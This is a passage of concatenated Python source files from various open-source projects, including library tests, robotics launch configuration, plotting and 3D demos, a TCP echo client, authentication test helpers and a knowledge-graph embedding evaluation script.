|
tests/zoomus/components/live_stream/test_update.py | seantibor/zoomus | 178 | 12686934 | import unittest
from zoomus import components, util
import responses
def suite():
"""Define all the tests of the module."""
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(UpdateV2TestCase))
return suite
class UpdateV2TestCase(unittest.TestCase):
def setUp(self):
self.component = components.live_stream.LiveStreamComponentV2(
base_uri="http://foo.com",
config={
"api_key": "KEY",
"api_secret": "SECRET",
"version": util.API_VERSION_2,
},
)
@responses.activate
def test_can_update(self):
responses.add(responses.PATCH, "http://foo.com/meetings/42/livestream")
response = self.component.update(
meeting_id="42", stream_url="https://foo.bar", stream_key="12345"
)
self.assertEqual(
response.request.body,
'{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}',
)
@responses.activate
def test_can_update_wildcard(self):
responses.add(responses.PATCH, "http://foo.com/meetings/42/livestream")
data = {
"meeting_id": "42",
"stream_url": "https://foo.bar",
"stream_key": "12345",
}
response = self.component.update(**data)
self.assertEqual(
response.request.body,
'{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}',
)
def test_requires_meeting_id(self):
with self.assertRaises(ValueError) as context:
self.component.update()
self.assertEqual(context.exception.message, "'meeting_id' must be set")
if __name__ == "__main__":
unittest.main()
|
env/Lib/site-packages/OpenGL/raw/GLES2/EXT/render_snorm.py | 5gconnectedbike/Navio2 | 210 | 12686946 | <filename>env/Lib/site-packages/OpenGL/raw/GLES2/EXT/render_snorm.py
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_EXT_render_snorm'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_EXT_render_snorm',error_checker=_errors._error_checker)
GL_BYTE=_C('GL_BYTE',0x1400)
GL_R16_SNORM_EXT=_C('GL_R16_SNORM_EXT',0x8F98)
GL_R8_SNORM=_C('GL_R8_SNORM',0x8F94)
GL_RG16_SNORM_EXT=_C('GL_RG16_SNORM_EXT',0x8F99)
GL_RG8_SNORM=_C('GL_RG8_SNORM',0x8F95)
GL_RGBA16_SNORM_EXT=_C('GL_RGBA16_SNORM_EXT',0x8F9B)
GL_RGBA8_SNORM=_C('GL_RGBA8_SNORM',0x8F97)
GL_SHORT=_C('GL_SHORT',0x1402)
|
examples/GridEYE_test.py | timgates42/PyBBIO | 102 | 12686961 | """
GridEYE_test.py
<NAME> <<EMAIL>>
Example program for PyBBIO's GridEYE library.
This example program is in the public domain.
"""
from bbio import *
from bbio.libraries.GridEYE import GridEYE
# Initialize the I2C bus:
I2C1.open()
# Create a GridEYE object:
grideye = GridEYE(I2C1)
ambient = grideye.getAmbientTemp()
frame = grideye.getFrame()
print "ambient temp: {:0.1f}C".format(ambient)
print "sensor temp:"
for y in range(8):
string = ""
for x in range(8):
string += " {:5.1f}".format(frame[y*8+x])
print string |
webots_ros2_epuck/launch/robot_launch.py | zegangYang/webots_ros2 | 176 | 12686968 | <reponame>zegangYang/webots_ros2
#!/usr/bin/env python
# Copyright 1996-2021 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch Webots e-puck driver."""
import os
import pathlib
import launch
from launch.substitutions import LaunchConfiguration
from launch.actions import DeclareLaunchArgument
from launch.substitutions.path_join_substitution import PathJoinSubstitution
from launch_ros.actions import Node
from launch import LaunchDescription
from ament_index_python.packages import get_package_share_directory
from webots_ros2_driver.webots_launcher import WebotsLauncher
def generate_launch_description():
package_dir = get_package_share_directory('webots_ros2_epuck')
world = LaunchConfiguration('world')
robot_description = pathlib.Path(os.path.join(package_dir, 'resource', 'epuck_webots.urdf')).read_text()
ros2_control_params = os.path.join(package_dir, 'resource', 'ros2_control.yml')
use_sim_time = LaunchConfiguration('use_sim_time', default=True)
webots = WebotsLauncher(
world=PathJoinSubstitution([package_dir, 'worlds', world])
)
controller_manager_timeout = ['--controller-manager-timeout', '50']
controller_manager_prefix = 'python.exe' if os.name == 'nt' else ''
diffdrive_controller_spawner = Node(
package='controller_manager',
executable='spawner.py',
output='screen',
prefix=controller_manager_prefix,
arguments=['diffdrive_controller'] + controller_manager_timeout,
parameters=[
{'use_sim_time': use_sim_time},
],
)
joint_state_broadcaster_spawner = Node(
package='controller_manager',
executable='spawner.py',
output='screen',
prefix=controller_manager_prefix,
arguments=['joint_state_broadcaster'] + controller_manager_timeout,
parameters=[
{'use_sim_time': use_sim_time},
],
)
epuck_driver = Node(
package='webots_ros2_driver',
executable='driver',
output='screen',
parameters=[
{'robot_description': robot_description,
'use_sim_time': use_sim_time},
ros2_control_params
],
remappings=[
('/diffdrive_controller/cmd_vel_unstamped', '/cmd_vel'),
]
)
epuck_process = Node(
package='webots_ros2_epuck',
executable='epuck_node',
output='screen',
parameters=[
{'use_sim_time': use_sim_time},
],
)
robot_state_publisher = Node(
package='robot_state_publisher',
executable='robot_state_publisher',
output='screen',
parameters=[{
'robot_description': '<robot name=""><link name=""/></robot>'
}],
)
footprint_publisher = Node(
package='tf2_ros',
executable='static_transform_publisher',
output='screen',
arguments=['0', '0', '0', '0', '0', '0', 'base_link', 'base_footprint'],
)
return LaunchDescription([
DeclareLaunchArgument(
'world',
default_value='epuck_world.wbt',
description='Choose one of the world files from `/webots_ros2_epuck/world` directory'
),
joint_state_broadcaster_spawner,
diffdrive_controller_spawner,
webots,
robot_state_publisher,
epuck_driver,
footprint_publisher,
epuck_process,
# This action will kill all nodes once the Webots simulation has exited
launch.actions.RegisterEventHandler(
event_handler=launch.event_handlers.OnProcessExit(
target_action=webots,
on_exit=[launch.actions.EmitEvent(event=launch.events.Shutdown())],
)
)
])
|
eventsourcing/examples/aggregate8/application.py | bibz/eventsourcing | 107 | 12686994 | <filename>eventsourcing/examples/aggregate8/application.py
from typing import Any, Dict
from uuid import UUID
from eventsourcing.application import Application
from eventsourcing.examples.aggregate8.domainmodel import Dog, Snapshot
from eventsourcing.examples.aggregate8.persistence import (
OrjsonTranscoder,
PydanticMapper,
)
from eventsourcing.persistence import Mapper, Transcoder
class DogSchool(Application):
env = {
"AGGREGATE_CACHE_MAXSIZE": "50",
"DEEPCOPY_FROM_AGGREGATE_CACHE": "n",
"IS_SNAPSHOTTING_ENABLED": "y",
}
snapshot_class = Snapshot
def register_dog(self, name: str) -> UUID:
dog = Dog(name)
self.save(dog)
return dog.id
def add_trick(self, dog_id: UUID, trick: str) -> None:
dog: Dog = self.repository.get(dog_id)
dog.add_trick(trick)
self.save(dog)
def get_dog(self, dog_id: UUID) -> Dict[str, Any]:
dog: Dog = self.repository.get(dog_id)
return {"name": dog.name, "tricks": tuple(dog.tricks)}
def construct_mapper(self) -> Mapper:
return self.factory.mapper(
transcoder=self.construct_transcoder(),
mapper_class=PydanticMapper,
)
def construct_transcoder(self) -> Transcoder:
return OrjsonTranscoder()
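# Illustrative usage sketch (assumed, not part of the original example module):
# exercises the DogSchool application defined above end to end.
if __name__ == "__main__":
    school = DogSchool()
    dog_id = school.register_dog("Fido")
    school.add_trick(dog_id, "roll over")
    print(school.get_dog(dog_id))  # expected: {'name': 'Fido', 'tricks': ('roll over',)}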
|
Demo/Network/tcp-echo-client.py | zaklaus/Shrine | 1,227 | 12687031 | #!/usr/bin/env python3
import socket
import sys
HOST = sys.argv[1]
PORT = int(sys.argv[2])
MESSAGE = sys.argv[3]
with socket.create_connection((HOST, PORT)) as s:
s.sendall(MESSAGE.encode())
data = s.recv(1024)
if data:
print('Received', data.decode())
|
tests/keras_contrib/optimizers/ftml_test.py | congson1293/keras-contrib | 1,335 | 12687070 | from __future__ import print_function
import pytest
from keras_contrib.utils.test_utils import is_tf_keras
from keras_contrib.tests import optimizers
from keras_contrib.optimizers import ftml
@pytest.mark.xfail(is_tf_keras,
reason='TODO fix this.',
strict=True)
def test_ftml():
optimizers._test_optimizer(ftml())
optimizers._test_optimizer(ftml(lr=0.003, beta_1=0.8,
beta_2=0.9, epsilon=1e-5,
decay=1e-3))
|
examples/python/extras/test_o3d.py | JeremyBYU/polylidar | 149 | 12687071 | <gh_stars>100-1000
"""Demo of Open3D 0.10.0 Slowdown
Please modify DIRECTORY to point to the folder of meshes attached to this issue reply
"""
import os
import open3d as o3d
import copy
DIRECTORY = 'fixtures/o3d_slow_down'
# o3d 0.10.0 - 9 seconds to load meshes (time until user interaction begins), 1 FPS (with draw edges enabled via 'w')
# o3d 0.11.0+f1d478c4 - 0.5 seconds, 45-60 FPS (with draw edges)
duplicate = 50
def main():
all_meshes = []
all_files = sorted(list(os.listdir(DIRECTORY)))
for filename in all_files:
print(filename)
mesh = o3d.io.read_triangle_mesh(os.path.join(DIRECTORY, filename))
all_meshes.extend([copy.deepcopy(mesh) for _ in range(duplicate)])
print(len(all_meshes))
o3d.visualization.draw_geometries(all_meshes)
if __name__ == "__main__":
main() |
tests/test_ihex.py | CreativeLau/stcgal | 469 | 12687076 | #
# Copyright (c) 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import unittest
import stcgal.ihex
class IHEXTests(unittest.TestCase):
"""Tests for IHEX reader"""
def test_simple(self):
"""Test reading a basic, valid file"""
lines = [
b":0B00000068656C6C6F5F776F726C645A",
b":00000001FF"
]
bindata = stcgal.ihex.IHex.read(lines).extract_data()
self.assertEqual(bindata, b"hello_world")
def test_empty(self):
"""Test reading an empty file"""
lines = []
bindata = stcgal.ihex.IHex.read(lines).extract_data()
self.assertEqual(bindata, b"")
def test_invalid(self):
"""Test invalid encoded data"""
lines = [
":abc"
]
with self.assertRaises(ValueError):
stcgal.ihex.IHex.read(lines)
def test_roundtrip(self):
"""Test round-trip through encoder/decoder"""
bindata = b"12345678"
for mode in (8, 16, 32):
with self.subTest(mode):
hexer = stcgal.ihex.IHex()
hexer.set_mode(mode)
hexer.insert_data(0, bindata)
encoded = hexer.write().encode("ASCII").splitlines()
decoded = stcgal.ihex.IHex.read(encoded).extract_data()
self.assertEqual(decoded, bindata)
|
foundations_ui/cypress/fixtures/atlas_scheduler/project_name/with_job_config_project/main.py | DeepLearnI/atlas | 296 | 12687083 | <gh_stars>100-1000
import foundations
import sys
foundations.log_metric("Task", sys.argv[1])
|
python/herbstluftwm/types.py | ju-sh/herbstluftwm | 925 | 12687093 | <gh_stars>100-1000
import re
"""
Module containing types used in the communication with herbstluftwm;
primarily, types used in attributes.
"""
class Point:
"""
A point on the 2D plane
"""
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return Point(self.x - other.x, self.y - other.y)
def __mul__(self, scalar):
"""multiply with a given scalar"""
return Point(self.x * scalar, self.y * scalar)
def __floordiv__(self, scalar):
"""divide by scalar factor, forcing to integer coordinates"""
return Point(self.x // scalar, self.y // scalar)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def __repr__(self) -> str:
return f'Point({self.x}, {self.y})'
class Rectangle:
"""
A rectangle on the screen, defined by its size and its distance to
the top left screen corner.
"""
def __init__(self, x=0, y=0, width=0, height=0):
self.x = x
self.y = y
self.width = width
self.height = height
def __str__(self):
return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'
def __repr__(self):
return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'
def __eq__(self, other):
return self.x == other.x \
and self.y == other.y \
and self.width == other.width \
and self.height == other.height
def to_user_str(self):
return "%dx%d%+d%+d" % (self.width, self.height, self.x, self.y)
@staticmethod
def from_user_str(string):
reg = '([0-9]+)x([0-9]+)([+-][0-9]+)([+-][0-9]+)'
m = re.match(reg, string)
if m is None:
raise Exception(f'"{string}" is not in format {reg}')
w = int(m.group(1))
h = int(m.group(2))
x = int(m.group(3))
y = int(m.group(4))
return Rectangle(x, y, w, h)
def adjusted(self, dx=0, dy=0, dw=0, dh=0):
"""return a new rectangle whose components
are adjusted by the provided deltas.
"""
return Rectangle(self.x + dx, self.y + dy, self.width + dw, self.height + dh)
def topleft(self) -> Point:
"""the top left corner of the rectangle"""
return Point(self.x, self.y)
def bottomright(self) -> Point:
"""the bottom right corner of the rectangle"""
return Point(self.x + self.width, self.y + self.height)
def center(self) -> Point:
"""the center of the rectangle, forced to integer coordinates"""
return self.topleft() + self.size() // 2
def size(self) -> Point:
"""width and height of the rectangle"""
return Point(self.width, self.height)
class HlwmType:
"""
Wrapper functions for converting between python types and types
in herbstluftwm.
"""
def __init__(self, name, from_user_str, to_user_str, is_instance):
# a hlwm type should define the following
self.name = name # type: str
# a callback for parsing
self.from_user_str = from_user_str # of type: str -> T
# a callback for printing
self.to_user_str = to_user_str # of type: T -> str
# a predicate whether a python variable has this type:
self.is_instance = is_instance # of type: Anything -> bool
@staticmethod
def by_name(type_name):
"""Given the full name of a hlwm type, return
the metadata
python type"""
for t in hlwm_types():
if t.name == type_name:
return t
return None
@staticmethod
def by_type_of_variable(python_variable):
"""Given a variable, detect its type
"""
for t in hlwm_types():
if t.is_instance(python_variable):
return t
return None
def hlwm_types():
"""
Return a list of HlwmType objects.
Unfortunately, the order matters for the is_instance() predicate: Here, the
first matching type in the list must be used. (This is because
`isinstance(True, int)` is true)
"""
types = [
HlwmType(name='bool',
from_user_str=bool_from_user_str,
to_user_str=lambda b: 'true' if b else 'false',
is_instance=lambda x: isinstance(x, bool)),
HlwmType(name='int',
from_user_str=int,
to_user_str=str,
is_instance=lambda x: isinstance(x, int)),
# there is no uint in python, so we just convert it to 'int'
HlwmType(name='uint',
from_user_str=int,
to_user_str=str,
is_instance=lambda x: False),
HlwmType(name='rectangle',
from_user_str=Rectangle.from_user_str,
to_user_str=Rectangle.to_user_str,
is_instance=lambda x: isinstance(x, Rectangle)),
HlwmType(name='string',
from_user_str=lambda x: x,
to_user_str=lambda x: x,
is_instance=lambda x: isinstance(x, str)),
]
return types
def bool_from_user_str(bool_string):
"""Parse a string description of a hlwm boolean to
a python boolean"""
if bool_string.lower() in ['true', 'on']:
return True
if bool_string.lower() in ['false', 'off']:
return False
raise Exception(f'"{bool_string}" is not a boolean')
|
extraPackages/matplotlib-3.0.3/examples/mplot3d/3d_bars.py | dolboBobo/python3_ios | 130 | 12687101 | <filename>extraPackages/matplotlib-3.0.3/examples/mplot3d/3d_bars.py<gh_stars>100-1000
"""
=====================
Demo of 3D bar charts
=====================
A basic demo of how to plot 3D bars with and without
shading.
"""
import numpy as np
import matplotlib.pyplot as plt
# This import registers the 3D projection, but is otherwise unused.
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
# setup the figure and axes
fig = plt.figure(figsize=(8, 3))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122, projection='3d')
# fake data
_x = np.arange(4)
_y = np.arange(5)
_xx, _yy = np.meshgrid(_x, _y)
x, y = _xx.ravel(), _yy.ravel()
top = x + y
bottom = np.zeros_like(top)
width = depth = 1
ax1.bar3d(x, y, bottom, width, depth, top, shade=True)
ax1.set_title('Shaded')
ax2.bar3d(x, y, bottom, width, depth, top, shade=False)
ax2.set_title('Not Shaded')
plt.show()
|
pymol/pymol_example_plugin.py | whitmans-max/python-examples | 140 | 12687129 | #!/usr/bin/env python2
# plugin can't have `-` in filename
# `pymol-example-plugin.py` will not work
# `pymol_example_plugin.py` will work
import Tkinter as tk
import tkMessageBox
import pymol
class ExamplePlugin:
def __init__(self, parent):
self.parent = parent
# window
win = tk.Toplevel(self.parent)
win.title('Example Plugin')
# label
b = tk.Label(win, text='Select option')
b.pack()
# checkbuttons
self.var = tk.IntVar()
self.cb = tk.Checkbutton(win, text='OFF', indicatoron=0, variable=self.var, command=self.toggle)
self.cb.pack()
# button
b = tk.Button(win, text='Close', command=win.destroy)
b.pack()
def toggle(self):
if self.var.get():
text = 'selected'
# change text on checkbutton
self.cb['text'] = 'ON'
else:
text = 'unselected'
# change text on checkbutton
self.cb['text'] = 'OFF'
tkMessageBox.showinfo('Selection status', text)
def show():
# it can work without `parent`
# but `parent` may give access to parent window
# (but I don't know if it is usefull)
parent = pymol.plugins.get_tk_root()
ExamplePlugin(parent)
def __init__(self):
# add to menu `Plugin`
self.menuBar.addmenuitem('Plugin', 'command', label='Example Plugin', command=show)
# create command 'ExamplePlugin' for `PyMOL>`
pymol.cmd.extend('ExamplePlugin', show)
# create shortcut which works in `Viewer`
pymol.cmd.set_key('CTRL-F', show)
# show plugin window at start (if you need it)
show()
|
maml/utils/_typing.py | anooptp/maml | 367 | 12687142 | """Define several typing for convenient use"""
from typing import Union, Callable, Optional, Any, List
import numpy as np
from pymatgen.core import Structure, Molecule
OptStrOrCallable = Optional[Union[str, Callable[..., Any]]]
StructureOrMolecule = Union[Structure, Molecule]
VectorLike = Union[List[float], np.ndarray]
|
tests/helpers.py | jleclanche/fastapi-cloudauth | 198 | 12687147 | <gh_stars>100-1000
import base64
import json
from dataclasses import dataclass
from typing import Any, Dict, Iterable, List, Tuple
import pytest
from fastapi import HTTPException
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.testclient import TestClient
from pydantic.main import BaseModel
from requests.models import Response
from fastapi_cloudauth.base import ScopedAuth, UserInfoAuth
from fastapi_cloudauth.verification import JWKsVerifier
@dataclass
class Auths:
protect_auth: ScopedAuth
protect_auth_ne: ScopedAuth
ms_auth: UserInfoAuth
ms_auth_ne: UserInfoAuth
invalid_ms_auth: UserInfoAuth
invalid_ms_auth_ne: UserInfoAuth
valid_claim: BaseModel
invalid_claim: BaseModel
class BaseTestCloudAuth:
"""
Required
setup: initialize test case
teardown: del items for test
decode: check decoded token and assigned info
"""
ACCESS_TOKEN = ""
SCOPE_ACCESS_TOKEN = ""
ID_TOKEN = ""
TESTAUTH: Auths
def setup(self, scope: Iterable[str]) -> None:
... # pragma: no cover
def teardown(self) -> None:
... # pragma: no cover
def decode(self) -> None:
... # pragma: no cover
def assert_get_response(
client: TestClient, endpoint: str, token: str, status_code: int, detail: str = ""
) -> Response:
if token:
headers = {"authorization": f"Bearer {token}"}
else:
headers = {}
response = client.get(endpoint, headers=headers)
assert response.status_code == status_code, f"{response.json()}"
if detail:
assert response.json().get("detail", "") == detail
return response
def _assert_verifier(token, verifier: JWKsVerifier) -> HTTPException:
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials=token)
with pytest.raises(HTTPException) as e:
verifier._verify_claims(http_auth)
return e.value
def _assert_verifier_no_error(token, verifier: JWKsVerifier) -> None:
http_auth = HTTPAuthorizationCredentials(scheme="a", credentials=token)
assert verifier._verify_claims(http_auth) is False
def decode_token(token: str) -> Tuple[Dict[str, Any], Dict[str, Any], List[str]]:
header, payload, *rest = token.split(".")
header += f"{'=' * (len(header) % 4)}"
payload += f"{'=' * (len(payload) % 4)}"
_header = json.loads(base64.b64decode(header).decode())
_payload = json.loads(base64.b64decode(payload).decode())
return _header, _payload, rest
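# Illustrative sketch (the endpoint path and expected status code are assumptions,
# not part of the original helpers): a typical call from a test case looks like
#
#     assert_get_response(client, "/user/", token="", status_code=403)
#
# i.e. a protected endpoint should reject a request that carries no bearer token.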
|
CapsE/evalCapsE.py | MedyG/kg-reeval | 104 | 12687153 | import tensorflow as tf
from scipy.stats import rankdata
import numpy as np
import os
import time
import datetime
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from builddata_softplus import *
from capsuleNet import CapsE
# Parameters
# ==================================================
parser = ArgumentParser("CapsE", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve')
parser.add_argument("--data", default="./data/", help="Data sources.")
parser.add_argument("--run_folder", default="./", help="Data sources.")
parser.add_argument("--name", default="WN18RR", help="Name of the dataset.")
parser.add_argument("--embedding_dim", default=100, type=int,
help="Dimensionality of character embedding (default: 128)")
parser.add_argument("--filter_size", default=1, type=int, help="Comma-separated filter sizes (default: '3,4,5')")
parser.add_argument("--num_filters", default=400, type=int, help="Number of filters per filter size (default: 128)")
parser.add_argument("--learning_rate", default=0.00001, type=float, help="Learning rate")
parser.add_argument("--batch_size", default=128, type=int, help="Batch Size")
parser.add_argument("--neg_ratio", default=1.0, help="Number of negative triples generated by positive (default: 1.0)")
parser.add_argument("--useInitialization", default=True, type=bool, help="Using the pretrained embeddings")
parser.add_argument("--num_epochs", default=51, type=int, help="Number of training epochs")
parser.add_argument("--savedEpochs", default=10, type=int, help="")
parser.add_argument("--allow_soft_placement", default=True, type=bool, help="Allow device soft device placement")
parser.add_argument("--log_device_placement", default=False, type=bool, help="Log placement of ops on devices")
parser.add_argument("--model_name", default='wn18rr_400_4', help="")
parser.add_argument("--useConstantInit", action='store_true')
parser.add_argument('--iter_routing', default=1, type=int, help='number of iterations in routing algorithm')
parser.add_argument('--num_outputs_secondCaps', default=1, type=int, help='')
parser.add_argument('--vec_len_secondCaps', default=10, type=int, help='')
parser.add_argument("--model_index", default='30')
parser.add_argument("--num_splits", default=8, type=int)
parser.add_argument("--testIdx", default=1, type=int, help="From 0 to 7")
parser.add_argument("--decode", action='store_false')
args = parser.parse_args()
print(args)
# Load data
print("Loading data...")
train, valid, test, words_indexes, indexes_words, \
headTailSelector, entity2id, id2entity, relation2id, id2relation = build_data(path=args.data, name=args.name)
data_size = len(train)
train_batch = Batch_Loader(train, words_indexes, indexes_words, headTailSelector, \
entity2id, id2entity, relation2id, id2relation, batch_size=args.batch_size,
neg_ratio=args.neg_ratio)
entity_array = np.array(list(train_batch.indexes_ents.keys()))
initialization = []
if args.useInitialization == True:
print("Using pre-trained initialization.")
initialization = np.empty([len(words_indexes), args.embedding_dim]).astype(np.float32)
initEnt, initRel = init_norm_Vector(args.data + args.name + '/relation2vec' + str(args.embedding_dim) + '.init',
args.data + args.name + '/entity2vec' + str(args.embedding_dim) + '.init',
args.embedding_dim)
for _word in words_indexes:
if _word in relation2id:
index = relation2id[_word]
_ind = words_indexes[_word]
initialization[_ind] = initRel[index]
elif _word in entity2id:
index = entity2id[_word]
_ind = words_indexes[_word]
initialization[_ind] = initEnt[index]
else:
print('*****************Error********************!')
break
initialization = np.array(initialization, dtype=np.float32)
assert len(words_indexes) % (len(entity2id) + len(relation2id)) == 0
print("Loading data... finished!")
x_valid = np.array(list(valid.keys())).astype(np.int32)
y_valid = np.array(list(valid.values())).astype(np.float32)
len_valid = len(x_valid)
batch_valid = int(len_valid / (args.num_splits - 1))
x_test = np.array(list(test.keys())).astype(np.int32)
y_test = np.array(list(test.values())).astype(np.float32)
len_test = len(x_test)
batch_test = int(len_test / (args.num_splits - 1))
# uncomment when tuning hyper-parameters on the validation set
# x_test = x_valid
# y_test = y_valid
# len_test = len_valid
# batch_test = batch_valid
##########################################
if args.decode == False:
lstModelNames = list(args.model_name.split(","))
for _model_name in lstModelNames:
out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE", _model_name))
print("Evaluating {}\n".format(out_dir))
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
lstModelIndexes = list(args.model_index.split(","))
for _model_index in lstModelIndexes:
_file = checkpoint_prefix + "-" + _model_index
lstHT = []
for _index in range(args.num_splits):
with open(_file + '.eval.' + str(_index) + '.txt') as f:
for _line in f:
if _line.strip() != '':
lstHT.append(list(map(float, _line.strip().split())))
lstHT = np.array(lstHT)
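            # Each split file holds summed (mr, mrr, hits@1, hits@10) rows for both head and
            # tail predictions, so the totals are averaged over 2 * len_test ranking queries.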
print(_file, 'mr, mrr, hits@1, hits@10 --> ', np.sum(lstHT, axis=0) / (2 * len_test))
print('------------------------------------')
else:
with tf.Graph().as_default():
tf.set_random_seed(1234)
session_conf = tf.ConfigProto(allow_soft_placement=args.allow_soft_placement,
log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
with sess.as_default():
global_step = tf.Variable(0, name="global_step", trainable=False)
capse = CapsE(sequence_length=x_valid.shape[1],
initialization=initialization,
embedding_size=args.embedding_dim,
filter_size=args.filter_size,
num_filters=args.num_filters,
vocab_size=len(words_indexes),
iter_routing=args.iter_routing,
batch_size=2 * args.batch_size,
num_outputs_secondCaps=args.num_outputs_secondCaps,
vec_len_secondCaps=args.vec_len_secondCaps,
useConstantInit=args.useConstantInit
)
# Output directory for models and summaries
lstModelNames = list(args.model_name.split(","))
for _model_name in lstModelNames:
out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE", _model_name))
print("Evaluating {}\n".format(out_dir))
# Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
lstModelIndexes = list(args.model_index.split(","))
for _model_index in lstModelIndexes:
_file = checkpoint_prefix + "-" + _model_index
capse.saver.restore(sess, _file)
print("Loaded model", _file)
# Predict function to predict scores for test data
def predict(x_batch, y_batch, writer=None):
feed_dict = {
capse.input_x: x_batch,
capse.input_y: y_batch
}
scores = sess.run([capse.predictions], feed_dict)
return scores
def test_prediction(x_batch, y_batch, head_or_tail='head'):
hits10 = 0.0
mrr = 0.0
mr = 0.0
hits1 = 0.0
for i in range(len(x_batch)):
new_x_batch = np.tile(x_batch[i], (len(entity2id), 1))
new_y_batch = np.tile(y_batch[i], (len(entity2id), 1))
if head_or_tail == 'head':
new_x_batch[:, 0] = entity_array
else: # 'tail'
new_x_batch[:, 2] = entity_array
lstIdx = []
for tmpIdxTriple in range(len(new_x_batch)):
tmpTriple = (new_x_batch[tmpIdxTriple][0], new_x_batch[tmpIdxTriple][1],
new_x_batch[tmpIdxTriple][2])
if (tmpTriple in train) or (tmpTriple in valid) or (
tmpTriple in test): # also remove the valid test triple
lstIdx.append(tmpIdxTriple)
new_x_batch = np.delete(new_x_batch, lstIdx, axis=0)
new_y_batch = np.delete(new_y_batch, lstIdx, axis=0)
# thus, insert the valid test triple again, to the beginning of the array
new_x_batch = np.insert(new_x_batch, 0, x_batch[i], axis=0) # thus, the index of the valid test triple is equal to 0
new_y_batch = np.insert(new_y_batch, 0, y_batch[i], axis=0)
# for running with a batch size
while len(new_x_batch) % ((int(args.neg_ratio) + 1) * args.batch_size) != 0:
new_x_batch = np.append(new_x_batch, [x_batch[i]], axis=0)
new_y_batch = np.append(new_y_batch, [y_batch[i]], axis=0)
results = []
listIndexes = range(0, len(new_x_batch), (int(args.neg_ratio) + 1) * args.batch_size)
for tmpIndex in range(len(listIndexes) - 1):
results = np.append(results, predict(
new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]],
new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]]))
results = np.append(results, predict(new_x_batch[listIndexes[-1]:], new_y_batch[listIndexes[-1]:]))
results = np.reshape(results, -1)
results_with_id = rankdata(results, method='ordinal')
_filter = results_with_id[0]
mr += _filter
mrr += 1.0 / _filter
if _filter <= 10:
hits10 += 1
if _filter == 1:
hits1 += 1
return np.array([mr, mrr, hits1, hits10])
if args.testIdx < (args.num_splits - 1):
head_results = test_prediction(
x_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
y_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
head_or_tail='head')
tail_results = test_prediction(
x_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
y_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)],
head_or_tail='tail')
else:
head_results = test_prediction(x_test[batch_test * args.testIdx: len_test],
y_test[batch_test * args.testIdx: len_test],
head_or_tail='head')
tail_results = test_prediction(x_test[batch_test * args.testIdx: len_test],
y_test[batch_test * args.testIdx: len_test],
head_or_tail='tail')
wri = open(_file + '.eval.' + str(args.testIdx) + '.txt', 'w')
for _val in head_results:
wri.write(str(_val) + ' ')
wri.write('\n')
for _val in tail_results:
wri.write(str(_val) + ' ')
wri.write('\n')
wri.close()
|
seq2seq/test/pooling_encoder_test.py | soupstandstop/test | 6,053 | 12687158 |
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
